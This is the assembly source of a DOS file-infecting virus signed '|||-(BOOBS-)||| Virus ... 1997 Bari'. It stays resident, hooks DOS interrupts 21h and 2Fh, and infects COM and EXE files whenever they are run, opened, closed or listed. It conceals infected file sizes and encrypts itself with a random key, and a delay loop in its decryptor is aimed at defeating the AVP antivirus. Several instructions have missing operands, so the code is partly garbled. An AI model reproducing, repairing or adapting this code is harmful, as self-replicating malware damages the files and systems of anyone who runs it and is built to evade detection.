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- .386
- ASSUME cs:CSeg
- FileHeaderRecord struc
- signature dw ?
- sizemod dw ?
- msize dw ?
- relocat dw ?
- headsize dw ?
- minalloc dw ?
- maxalloc dw ?
- stackseg dw ?
- stackofs dw ?
- check dw ?
- ip dw ?
- codes dw ?
- Checksum dw ?
- checkOvr dw ?
- FileHeaderRecord ends
- SearchRecord struc
- date dw ?
- time dw ?
- SearchRecord ends
- ExecBlockRecord struc
- Env dw ?
- Cmd dd ?
- ExecBlockRecord ends
- Findrecord struc
- FindBuf db 128 dup (?)
- Findofs dw ?
- Findrecord ends
- VIR_PAR = ((END_TSR - START_TSR ) / 16) + 2
- VIR_LEN = (REAL_CODE - START_TSR) + 1 ; dim virus in memoria
- VIR_TRUE_LEN = ( REAL_CODE - START_TSR ) + 1 ; dimensione del virus su file
- already = 0 ; already infected
- ready = 1 ; ready to be infected
- com = 2 ; com file
- exe = 3 ; exe file
- other = 4 ; other
- true = 1
- false = 0
- maxfiles = 26 ; max file no to open , must be (maxfiles*2)/4 integer
- START_TSR equ $
- AfterCryp : call SH
- SH : pop bp
- sub bp,3
- push ds
- pop es
- mov ax,0fe01h
- int 2fh
- cmp al,0ffh
- jne short Novirus
- YesVirus : db 0e9h
- jmp_addr dw ?
- mov ax,ds ; ES = DS = PSP = AX
- add ax,10h ; PSP + 1 paragraph
- mov bx,cs:[bp][templateheader.stackseg]
- add bx,ax
- cli
- mov ss,bx
- mov sp,cs:[bp][templateheader.stackofs]
- sti
- mov bx,cs:[bp][]
- add bx,ax
- push bx ; push CS
- push cs:[bp][templateheader.ip] ; push IP
- @jump : xor eax,eax
- xor ebx,ebx
- xor ecx,ecx
- xor edx,edx
- xor esi,esi
- xor edi,edi
- xor ebp,ebp
- retf ; jmp to host CS:IP
- com_exec : push cs ; COM settings
- mov si,bp
- add si,offset @com_buf
- mov di,100h
- push di
- cld
- movsd
- jmp short @jump
- NoVirus : mov es,word ptr ds:[2ch] ; enviroment segment
- mov word ptr cs:[bp][tmp_COMseg],es
- push ds
- mov ax,ds ; DS = PSP
- dec ax ; AX = MCB
- mov ds,ax
- mov bl,02h ; last fit
- mov ax,5801h
- int 21h ; set
- mov bx,VIR_PAR ; malloc
- mov ah,48h
- int 21h
- jnc short malloc ; problems ?
- push ax dx
- mov ah,2
- mov dl,7
- int 21h
- pop dx ax
- push ds
- pop ax
- mov bx,4d03h
- mov ds:[0],bh ;'M'
- xor bh,bh
- sub word ptr ds:[bx],VIR_PAR
- inc ax
- add ax,ds:[bx]
- mov ds,ax
- mov word ptr ds:[bx],VIR_PAR-1
- mov bl,'Z'
- mov ds:[0],bl ; Z in last MCB
- inc ax
- malloc : mov es,ax
- dec ax
- push ax
- pop ds
- mov bx,8
- mov ds:[1],bx ; owned by dos 0008
- mov word ptr ds:[bx],'CS'
- xor bl,bl ; restore strategy
- mov ax,5801h
- int 21h
- cld
- xor di,di
- mov si,bp
- push cs
- pop ds
- mov cx,(VIR_LEN / 4) + 1
- rep movsd
- call clean_x_stack
- cli
- xor ax,ax
- mov ds,ax
- mov eax,es
- shl eax,16
- mov ax,offset HOOK_21
- xchg ds:[84h],eax
- mov es:TRAPPED_21,eax
- mov eax,es
- shl eax,16
- mov ax,offset HOOK_2F
- xchg ds:[0bch],eax
- mov es:TRAPPED_2F,eax
- pop ds ; DS = PSP
- mov es:sleep,FALSE
- mov es:command_Flag,TRUE
- mov ax,cs:[bp][tmp_COMseg]
- mov es:COMseg,ax
- push ds
- pop es
- sti
- jmp yesvirus
- tmp_COMseg dw ?
- HOOK_2F : cmp ah,0feh
- jne short ChkintWin
- mov al,0ffh
- iret
- ;///// Chkintwin and ChkEndwin disable the virus during installation check in
- ; win311 and under Msdos prompt in w95 /////
- ; Under Msdos prompt only some int21h trap worked :(( i.e 4b
- ; but 3dh,3eh and some other as all long filenames functions didn't work
- ; i dunno the reason since i hadn't have much time for solving the question
- ; if someone can explain it let me know pleaze :)
- ChkintWin : cmp ax,1605h
- jne short chkendwin
- mov cs:sleep,TRUE
- jmp short pass2f
- ChkEndWin : cmp ax,1606h
- jne short pass2f
- mov cs:sleep,FALSE
- pass2f : db 0eah
- TRAPPED_2F dd ?
- HOOK_21 : cmp cs:command_flag,TRUE
- jne short Check_int
- call @COMM_COM
- Check_int : cmp cs:sleep,TRUE
- je short org_21
- cmp ax,cs:[intr_sub_w] ;4b00h
- je @EXEC00
- cmp ax,cs:[intr_sub_w+2] ;4b01h
- je @LD&EX
- cmp ah,cs:[intr_sub_b] ;1ah
- cmp ah,cs:[intr_sub_b+1] ;4eh
- cmp ah,cs:[intr_sub_b+2] ;4fh
- cmp ah,cs:[intr_sub_b+3] ;3dh
- je @OPEN
- cmp ah,cs:[intr_sub_b+4] ;3eh
- je @CLOSE
- cmp ax,cs:[intr_sub_w+4] ;6c00h
- cmp ah,cs:[intr_sub_b+5] ;11h
- je @FCB_FIND
- cmp ah,cs:[intr_sub_b+6] ;12h
- je @FCB_FIND
- org_21 : db 0eah
- TRAPPED_21 dd ?
- @COMM_COM : pushad
- push ds es
- cld
- mov ax,cs:COMseg
- mov es,ax
- xor di,di
- mov cx,256
- @pre_loop : mov eax,'SMOC'
- @loop_a : scasd
- jz short @nxt_ck
- sub di,3
- loop @loop_a
- jmp @fail
- @nxt_ck : mov eax,'=CEP'
- scasd
- jz short @it_is
- sub di,3
- jmp short @pre_loop
- @it_is : push es
- pop ds
- mov si,di
- push cs
- pop es
- mov di,offset Data_Buffer
- mov cx,256
- @loop_b : lodsb
- or al,al
- jz short @copy_end
- stosb
- loop @loop_b
- @copy_end : stosb
- push cs
- pop ds
- mov dx,offset Data_Buffer ; DS:DX path
- mov bx,dx
- call GetFattrib ; CX attributo
- jc short @fail
- push cx dx ds
- call openfile ; BX handle
- call FileInfect
- call closefile
- pop ds dx cx
- call SetFattrib
- @fail : pop es ds
- popad
- mov cs:command_flag,FALSE
- ret
- @EXEC00 : call CheckIfExe
- jnz org_21
- pushad
- push es ds ; DS:DX ASCIZ filename
- call vir_handler
- call getFattrib
- jc short @no_inf ; CX attributo
- push cx ds dx
- call openfile
- call FileInfect
- call closefile
- pop dx ds cx
- call SetFattrib
- @no_inf : call dos_handler
- pop ds es
- popad
- call int21h
- jmp Intret
- @LD&EX : push es ds
- pushad
- call vir_handler
- call GetFattrib
- jc short ex_ld ; CX attributo
- push cx dx ds
- call OpenFile
- jc short ex_ld
- call FileClean
- call closefile
- pop ds dx cx
- call SetFattrib
- ex_ld : call dos_handler
- popad
- pop ds es
- push ds dx
- call int21h
- pop dx ds
- pushf
- push es ds
- pushad
- call vir_handler
- call GetFattrib
- jc short not_ld ; CX attrib
- push cx ds dx
- call OpenFile
- call FileInfect
- call closefile
- pop dx ds cx
- call SetFattrib
- not_ld : call dos_handler
- popad
- pop ds es
- popf
- jmp Intret
- @OPEN : call CheckIfExe
- jnz org_21
- push es ds
- pushad
- call vir_handler
- call GetFattrib
- jc short Skip_file ; CX attrib
- push cx ds dx
- call OpenFile
- call FileClean
- call CloseFile
- pop dx ds cx
- call SetFattrib
- call dos_handler
- popad
- pop ds es
- push ds dx
- call int21h
- pop dx ds
- jc short @no_open
- xchg ax,bx
- call PushHandle
- xchg bx,ax
- jmp Intret
- @no_open : pushf
- cmp al,5
- jne short @no_mat
- push es ds
- pushad
- call vir_handler
- call GetFattrib
- jc short @a
- push cx ds dx
- call OpenFile
- call FileInfect
- call CloseFile
- pop dx ds cx
- call SetFattrib
- call dos_handler
- @a : popad
- pop ds es
- @no_mat : popf
- jmp Intret
- Skip_file : popad
- pop ds es
- call dos_handler
- jmp org_21
- @EXTOPEN : xchg si,dx
- call CheckIfExe
- xchg dx,si
- jnz org_21
- push es ds
- pushad
- call vir_handler
- mov dx,si
- call GetFattrib
- jc short @aa
- push cx ds dx
- call OpenFile
- call FileClean
- call closefile
- pop dx ds cx
- call SetFattrib
- @aa : call dos_handler
- popad
- pop ds es
- push ds si
- call int21h
- pop dx ds
- jc @no_open
- xchg ax,bx
- call PushHandle ; save handle
- xchg bx,ax
- jmp Intret
- ; // SFT and JFT didn't work in Msdos Prompt :(( //
- @CLOSE : call Pophandle
- jc org_21
- call vir_handler
- pushad
- push ds es
- push bx
- mov ax,1220h ; BX handle
- call int2fh ; ES:DI JFT
- xor bx,bx
- mov bl,byte ptr es:[di]
- mov ax,1216h ; bx entry number for
- call int2fh ; ES:DI SFT
- mov byte ptr es:[di+2],2
- pop bx
- call FileInfect
- pop es ds
- popad
- call int21h ; exec int
- call dos_handler
- clc
- jmp Intret
- @FINDFIRST : push ax cx si di es ; DS:DX find filename
- pushf
- mov si,dx
- push cs
- pop es
- mov di,offset findvar
- cld
- push di
- xor ax,ax
- mov cx,(size Findvar - 2) / 2
- rep stosw ; reset Findvar
- pop di
- mov ah,60h ; DS:SI filename
- call Int21h ; ES:DI canonaized
- mov di,offset findvar + size findvar - 2
- mov cx,size findvar - 2 - 1
- std
- mov al,''
- repnz scasb
- jz short o
- sub di,3
- o : add di,2
- mov cs:Findvar.Findofs,di
- popf
- pop es di si cx ax
- @FINDNEXT : call int21h
- jc Intret
- FindProc : pushad
- push ds es
- pushf
- mov ds,cs:DTAseg
- mov si,cs:DTAofs
- add si,1eh ; DS:SI punta al
- ; filename nella DTA
- push cs
- pop es
- mov di,cs:findvar.findofs ; ES:DI path filename
- cld
- CopyName: movsb
- cmp byte ptr ds:[si],0
- jne short CopyNAme
- mov byte ptr es:[di],0
- ; Findvar now has the ASCIZ filename to pass to Openfile
- push cs
- pop ds
- mov dx,offset Findvar
- call CheckIfExe
- jnz short DonotTreat
- call OpenFile
- jc short DoNotTreat
- call CheckXinf
- cmp file_type,other
- je short CanClose
- cmp file_status,already
- jne short CanClose
- mov es,DTAseg
- mov di,DTAofs
- sub dword ptr es:[di+1ah],vir_true_len - 1
- CanClose : call CloseFile
- DoNotTreat: popf
- pop es ds
- popad
- jmp Intret
- @SAVEDTA : mov cs:DTAofs,dx
- mov cs:DTAseg,ds
- jmp org_21
- @FCB_FIND : call int21h
- pushf
- push es ax bx
- les bx,dword ptr cs:DTAofs
- mov al,byte ptr es:[bx]
- cmp al,0ffh ; vede se FCB esteso
- jne short @ok_good
- add bx,7
- @ok_good : pusha
- push ds es
- mov ah,47h ; get cur dir
- mov dl,byte ptr es:[bx] ; drive number
- push cs
- pop ds
- mov si,offset FindVar
- call int21h ; return ASCIZ directory
- push cs
- pop es
- cld
- cmp byte ptr ds:[si],0 ; root ?
- jne short @path
- mov ax,offset FindVar
- add ax,3
- mov cs:FindVar.FindOfs,ax
- jmp short @root
- @path : mov di,offset FindVar
- xor al,al
- @@f : scasb ; look for the end of the dirname
- jnz short @@f
- mov si,di
- dec si
- mov byte ptr es:[si],''
- add di,3
- mov es:FindVar.FindOfs,di
- dec di
- std
- @cp : movsb
- cmp si,offset FindVar
- jae short @cp
- @root : mov word ptr es:[offset FindVar+1],':'
- add dl,'A' - 1
- mov byte ptr es:[offset FindVar],dl ; drive letter
- pop es ds
- popa
- pusha
- push ds es ; ES:BX DTA
- push es
- pop ds ; DS = ES
- mov si,1
- add si,bx ; file name ds:si
- push cs
- pop es
- mov di,cs:FindVar.FindOfs
- mov cx,8
- cld
- @lp1 : lodsb
- cmp al,20h
- je short @end_1
- stosb
- loop @lp1
- @end_1 : mov al,'.'
- stosb
- mov cx,3
- mov si,9
- add si,bx
- rep movsb
- xor al,al
- stosb ; Z terminated
- push cs
- pop ds
- mov dx, offset FindVar ; ASCIZ filename
- mov bp,bx
- call CheckIfExe
- jnz short @not_op
- call OpenFile
- jc short @not_op
- call CheckXinf
- cmp file_type,other
- je short @CanClose
- cmp file_status,already
- jne short @CanClose
- mov es,cs:DTAseg
- sub dword ptr es:[bp+1dh],VIR_TRUE_LEN - 1 ; real size
- @CanClose : call CloseFile
- @not_op : pop es ds
- popa
- @NotInf : pop bx ax es
- popf
- Intret proc
- cli
- push ax
- pushf
- pop ax
- add sp,8
- push ax
- sub sp,6
- pop ax
- sti
- iret
- Intret endp
- int21h proc
- pushf
- call dword ptr cs:TRAPPED_21
- ret
- int21h endp
- int2fh proc
- pushf
- call dword ptr cs:TRAPPED_2F
- ret
- int2fh endp
- vir_handler proc
- cli
- push eax ds
- xor ax,ax
- mov ds,ax
- mov eax,cs
- shl eax,16
- mov ax,offset critical
- xchg ds:[90h],eax
- mov cs:TRAPPED_24,eax
- pop ds eax
- sti
- ret
- vir_handler endp
- dos_handler proc
- push ds ax
- cli
- xor ax,ax
- mov ds,ax
- db 66h
- dw 06c7h
- dw 0090h
- TRAPPED_24 dd ? ; mov ds:[90h],cs:TRAPPED_24
- pop ax ds
- sti
- ret
- dos_handler endp
- critical proc
- xor al,al
- iret
- critical endp
- openfile proc
- mov ah,3dh
- xor al,al
- add al,2
- ; mov ax,3d02h
- call int21h
- mov bx,ax
- ret ; out : BX handle
- openFile endp
- closeFile proc
- mov ah,3eh ; in : BX handle
- call int21h
- ret
- closefile endp
- GetFAttrib proc
- push ax
- mov ah,43h
- xor al,al
- ; mov ax,4300h
- push ax
- call int21h ; CX attributo
- pop ax
- inc al
- push cx
- ; mov ax,4301h
- push ax
- call int21h
- pop ax
- jc short out_f
- ; mov ax,4301h
- mov cx,32
- call int21h
- out_f : pop cx
- pop ax ; ritorna CX attributo
- ret ; ritona carry se errore
- SetFattrib proc
- push ax ; in CX attributo
- mov ah,43h
- xor al,al
- inc al
- ; mov ax,4301h
- call int21h
- pop ax
- ret
- SetFattrib endp
- GetFAttrib endp
- FileEnd proc
- mov ah,42h
- xor al,al
- add al,2
- ; mov ax,4202h
- xor cx,cx
- xor dx,dx
- call int21h ; DX:AX file size
- ret
- FileEnd endp
- Filestart proc
- xor cx,cx
- xor dx,dx
- Filestart endp
- FileSeek proc
- mov ax,4200h
- call int21h
- ret
- FileSeek endp
- blockread proc
- mov ah,3fh
- call int21h
- ret
- blockread endp
- blockwrite proc
- mov ah,40h
- call int21h
- ret
- blockwrite endp
- GetDateTime proc
- mov ah,57h
- xor al,al
- ; mov ax,5700h
- call Int21h
- mov,dx
- mov cs:searchrec.time,cx
- ret
- GetdateTime endp
- SetDateTime proc
- mov dx,
- mov cx,cs:searchrec.time
- mov ah,57h
- xor al,al
- inc al
- ; mov ax,5701h
- call Int21h
- ret
- SetdateTime endp
- commit_file proc
- mov ah,68h
- call int21h ; commit file
- ret
- commit_file endp
- clean_x_stack proc
- mov di,offset searchstack
- mov cx, (size searchstack) / 4
- xor eax,eax
- rep stosd
- ret
- clean_x_stack endp
- CheckIfExe proc ; DS:DX filename
- push es di ax
- push ds
- pop es
- cld
- mov di,dx ; ES:DI filename
- xor ax,ax
- FindZ : scasb
- jnz short FindZ
- cmp dword ptr [di-5],'exe.'
- je short is_exe
- cmp dword ptr [di-5],'EXE.'
- je short is_exe
- cmp dword ptr [di-5],'moc.'
- je short is_exe
- cmp dword ptr [di-5],'MOC.'
- is_exe : pop ax di es
- ret
- CheckIfExe endp
- PushHandle proc
- pushf
- push ax cx es di
- push cs
- pop es
- mov di,offset SearchStack ; ES:DI SearchStack
- cld
- mov cx,maxfiles
- xor ax,ax
- repnz scasw
- jnz short Nofree
- mov word ptr es:[di-2],bx ; sets handle
- Nofree: pop di es cx ax
- popf
- ret
- PushHandle endp
- PopHandle proc
- push ax cx es di
- or bx,bx
- jz short Nofree1 ; BX = 0 ?
- push cs
- pop es
- cld
- mov di,offset SearchStack
- mov cx,maxfiles
- mov ax,bx
- repnz scasw
- jnz short Nofree1
- mov word ptr es:[di-2],0 ; free handle
- clc
- jmp short exitpop
- Nofree1 : stc
- Exitpop : pop di es cx ax
- ret
- PopHandle endp
- Calc_check proc
- push si ; DS = CS
- xor dx,dx
- mov si,size fileheader - 4
- @chk : add dx,[si+offset fileheader]
- sub si,2
- jnz short @chk
- pop si ; DX = checksum
- ret
- Calc_check endp
- CheckXinf proc
- mov file_status,already
- call Filestart
- mov cx,size Fileheader
- mov dx, offset Fileheader
- call BlockRead
- mov cx,cs:[MZsig]
- dec cx
- cmp fileheader.signature,cx
- je short IsanExe
- mov cx,cs:[ZMsig]
- dec cx
- cmp fileheader.signature,cx ; vede se e' un file EXE
- je short IsanExe
- mov file_type,com
- call FileEnd ; DX:AX dim file
- sub ax,VIR_TRUE_LEN - 1
- sub ax,3
- cmp ax,word ptr fileheader.signature+1
- je GotoEnd ; infected
- jmp Except
- IsAnExe : mov file_type,exe
- cmp fileheader.Checksum,40h
- jne short @good ; not a PE,NE,LE ....
- mov file_type,other
- jmp GotoEnd
- @good : call calc_check
- cmp dx,fileheader.CheckOvr
- je GoToEnd ; already infected
- Cont : call FileEnd ; DX:AX dimens file
- shl edx,16
- mov dx,ax
- movzx edi,fileheader.msize
- movzx esi,fileheader.sizemod
- dec edi
- imul edi,512
- add edi,esi
- cmp edi,edx ; malloc = filesize
- je short Except
- ;//**** SFT and JFT doesnt work in dos7 prompt from w95 :(( ****** ///
- ;//**** This is used for infecting COMMAND.COM under dos7 which is not a .COM
- ;//**** file but a real EXE
- Chk_Com : push bx es
- mov ax,1220h ; BX handle
- call int2fh ; ES:DI JFT
- xor bx,bx
- mov bl,byte ptr es:[di]
- mov ax,1216h ; bx entry number for
- call int2fh ; ES:DI SFT
- cld
- add di,20h ; go to filename
- mov eax,'MMOC'
- scasd
- jnz short no_com_com
- mov eax,' DNA'
- scasd
- jnz short no_com_com
- mov ax,'OC'
- scasw
- no_com_com : pop es bx
- jz short except
- mov file_type,other
- jmp short GotoEnd
- except : mov file_status,ready
- GoToEnd : call FileEnd
- ret
- ; DX:AX dimensione file
- CheckXinf endp
- FileInfect proc
- push cs cs
- pop ds es
- call CheckXInf ; DX:AX dimens file
- cmp file_type,other
- je Infectexit
- cmp file_status,ready
- jne infectexit
- cld
- mov word ptr f_size,ax ; salva dim per .COM
- mov si,offset fileheader
- mov di,offset @com_buf
- movsd
- cmp dx,0
- ja short @not_less
- cmp ax,23000
- ja short @not_less
- jmp infectexit
- @not_less : cmp dx,7
- ja Infectexit
- cld
- mov si,offset fileheader + 2
- mov di,offset templateheader + 2
- mov cx,(size fileheader) / 2 - 1
- rep movsw
- push ax dx
- add ax,VIR_TRUE_LEN
- adc dx,0
- mov cx,512
- div cx
- inc ax ; AX = quoziente DX=resto
- mov fileheader.msize,ax ; nuova memory size
- mov fileheader.sizemod,dx ; nuovo memory module
- pop dx ax
- adc dx,0
- mov cx,16
- div cx ; AX:DX = CS:IP
- mov fileheader.ip,dx
- push ax
- xor dx,dx
- mov ax,VIR_TRUE_LEN
- add ax,cx
- add fileheader.ip,ax
- mov cx,16
- div cx
- sub fileheader.ip,dx
- mov dx,fileheader.ip
- dec dx
- mov first_addr,dx
- mov cmp_addr,dx
- mov dx,ax
- pop ax
- sub ax,dx
- sub ax,fileheader.headsize
- mov,ax ; setta CS:IP nuovi
- mov fileheader.stackseg,ax
- add fileheader.stackofs,(VIR_PAR + 4) * 16 ; mi metto al sicuro
- call GetDateTime
- call calc_check ; dx checksum
- mov fileheader.checkovr,dx
- LeaveSo : call FileStart
- cmp file_type,com
- jne @exe1
- mov jmp_addr,offset com_exec - offset yesvirus - 3
- mov byte ptr fileheader,0e9h
- mov cx,f_size
- sub cx,3
- mov word ptr fileheader+1,cx
- add cx,102h
- mov first_addr,cx
- mov cmp_addr,cx
- mov dx,offset FIleheader
- mov cx,3
- call BlockWrite
- jmp short ordinary
- @exe1 : mov jmp_addr,0
- mov dx,offset Fileheader
- mov cx,size fileheader
- call BlockWrite ; scrive header
- ordinary : call FileEnd
- call Criptate ; return CX =
- ; virus lenght
- mov dx,offset Data_Buffer
- mov cx,VIR_TRUE_LEN - 1
- call BlockWrite
- call SetDateTime
- call commit_file
- InfectExit : ret
- FileInfect endp
- FileClean proc
- push cs
- pop ds
- call CheckXInf ; DX:AX dimens file
- cmp file_type,other
- je clean_out
- cmp file_status,already
- jne clean_out
- sub ax,size templateheader + 4 ;size @com_buf
- sbb dx,0
- mov cx,dx
- mov dx,ax
- call FileSeek
- mov cx,size templateheader + 4 ;size @com_buf
- ; read real fileheader
- mov dx,offset @com_buf
- call Blockread
- call FileStart
- call GetdateTime
- cmp file_type,com
- jne short @exe2
- mov cx,4
- mov dx,offset @com_buf
- call Blockwrite
- jmp short ordinary1
- @exe2 : mov cx,cs:[MZsig]
- dec cx
- mov templateheader.signature,cx
- mov dx,offset templateHeader
- mov cx,size templateheader
- call BlockWrite
- ordinary1 : call fileEnd
- sub ax,vir_true_len - 1
- sbb dx,0
- mov cx,dx
- mov dx,ax
- call FileSeek
- xor cx,cx
- call Blockwrite
- call SetDateTime
- call commit_file
- clean_out : ret
- FileClean endp
- Criptate proc
- push bx
- xor bx,bx
- mov ds,bx
- mov bx,word ptr ds:[46ch] ; ritorna numero casuale
- push cs cs
- pop ds es
- mov k_code,bl
- mov k1_code,bl
- mov si,bx
- and si,3
- cmp si,3
- jl short @well
- xor si,si
- @well : mov bh,byte ptr [offset cripstyle+si]
- mov cripmode,bh
- mov bh,byte ptr [offset uncripstyle+si]
- mov uncripmode,bh
- std
- mov si,offset NONCRYPTED - 1
- mov di,offset Data_Buffer + (NONCRYPTED - START_TSR) - 1
- @crip : bt si,15
- jc short @stop
- lodsb
- cripmode db ?
- k_code db ? ; xor add sub ,k_code
- stosb
- jmp short @crip
- @stop : cld
- mov si,offset @uncr_code
- mov di,offset offset Data_Buffer + (NONCRYPTED - START_TSR)
- mov cx,REAL_CODE - offset @uncr_code
- rep movsb
- pop bx
- ret
- Criptate endp
- Cripstyle db 034h ; xor
- db 04h ; add
- db 02ch ; sub
- Uncripstyle db 34h ; xor
- db 2ch ; sub
- db 04h ; add
- Message db '|||-(BOOBS-)||| Virus , Once again deep in Terronia Land '
- db '1997 Bari'
- intr_sub_w dw 4b00h,4b01h,6c00h
- intr_sub_b db 1ah,4eh,4fh,3dh,3eh,11h,12h
- MZsig dw 'ZM'+1
- ZMsig dw 'MZ'+1
- @uncr_code : db 0beh
- first_addr dw ? ; mov si,first_addr
- @uncr : db 02eh ; xor cs:[si]
- db 80h
- uncripmode db ?
- k1_code db ?
- mov cx,4000 ; do-nothing loop
- @m1: inc si ; to waste time
- dec si ; to
- loop @m1 ; fuck AVP
- dec si
- db 81h
- db 0feh
- cmp_addr dw ? ; cmp si,
- jne short @uncr
- @end : jmp AfterCryp
- @com_buf db 4 dup (?)
- templateheader FileheaderRecord <> ; real file header
- REAL_CODE equ $
- Fileheader FileheaderRecord <> ; header
- file_status db ? ; infection flag
- file_type db ?
- sleep db ? ; flag for Windows 3.X
- command_flag db ? ; infect ?
- Searchrec Searchrecord <> ; date & time record
- SearchStack dw Maxfiles dup (?) ; stack for f-handle
- FindVar Findrecord <> ; findfirst & findnext
- SFT db 03bh dup (0) ; System File Table Buffer
- DTAofs dw ? ; DTA for Findfirst,next
- DTASeg dw ?
- COMSeg dw ? ; SEG for
- f_size dw ? ; com size
- Data_Buffer db VIR_TRUE_LEN + 16 dup (?) ; Virus temp buffer
- END_TSR equ $
- main : mov ax,ds ; DS = PSP
- dec ax ; AX = MCB
- mov ds,ax
- mov byte ptr ds:[0],'M'
- sub word ptr ds:[3],VIR_PAR
- inc ax
- add ax,ds:[3]
- mov ds,ax
- mov byte ptr ds:[0],'Z' ; Z nell'ultimo MCB
- mov word ptr ds:[1],0008
- mov word ptr ds:[3],VIR_PAR-1
- mov word ptr ds:[8],'CS'
- inc ax ; SEG TSR
- cld
- mov es,ax
- xor si,si
- xor di,di
- push cs
- pop ds
- mov cx,(VIR_LEN / 4) + 1
- rep movsd
- call clean_x_stack
- cli
- xor ax,ax
- mov ds,ax
- mov eax,es
- shl eax,16
- mov ax,offset HOOK_21
- xchg ds:[84h],eax
- mov es:TRAPPED_21,eax
- mov eax,es
- shl eax,16
- mov ax,offset HOOK_2F
- xchg ds:[0bch],eax
- mov es:TRAPPED_2F,eax
- mov es:sleep,FALSE
- mov es:command_flag,FALSE
- sti
- mov ax,4c00h
- int 21h
- CSeg ends
- end main
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